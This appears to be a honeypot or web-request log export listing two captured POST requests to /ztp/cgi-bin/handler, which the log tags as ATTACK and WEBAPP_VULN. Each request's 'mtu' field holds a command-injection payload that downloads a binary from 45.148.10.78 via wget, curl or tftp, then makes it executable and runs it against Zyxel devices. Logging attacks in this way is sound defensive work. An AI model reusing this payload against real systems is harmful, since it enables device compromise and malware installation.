# Remote Address Threat Level Method Path Query String Headers Body Acceptable Timestamp Port Request Types Attack Types Analyse Request Other Requests by Actor CSV Dump
1 141.98.83.197 6 POST /ztp/cgi-bin/handler
Header Value
Content-Type application/json
Content-Length 305
Host 188.245.40.243:80
User-Agent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
Parameter Value
command setWanPortSt
data rootsenpai on top
mtu ;cd /tmp; rm -rf shk; wget http://45.148.10.78/shk || curl http://45.148.10.78/shk || tftp 45.148.10.78 -c get shk || tftp -g -r shk 45.148.10.78; chmod 777 shk; ./shk zyxel; rm -rf shk;
port 4
proto dhcp
vlan_tagged 1
vlanid 5
False 2024-06-26 10:02:19.882056 80
RECON
ATTACK
GRAB
WEBAPP_VULN
LFI
2 141.98.83.197 6 POST /ztp/cgi-bin/handler
Header Value
Content-Type application/json
Content-Length 305
Host 188.245.40.243:443
User-Agent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
Parameter Value
command setWanPortSt
data rootsenpai on top
mtu ;cd /tmp; rm -rf shk; wget http://45.148.10.78/shk || curl http://45.148.10.78/shk || tftp 45.148.10.78 -c get shk || tftp -g -r shk 45.148.10.78; chmod 777 shk; ./shk zyxel; rm -rf shk;
port 4
proto dhcp
vlan_tagged 1
vlanid 5
False 2024-06-26 08:13:24.380287 80
RECON
ATTACK
GRAB
WEBAPP_VULN
LFI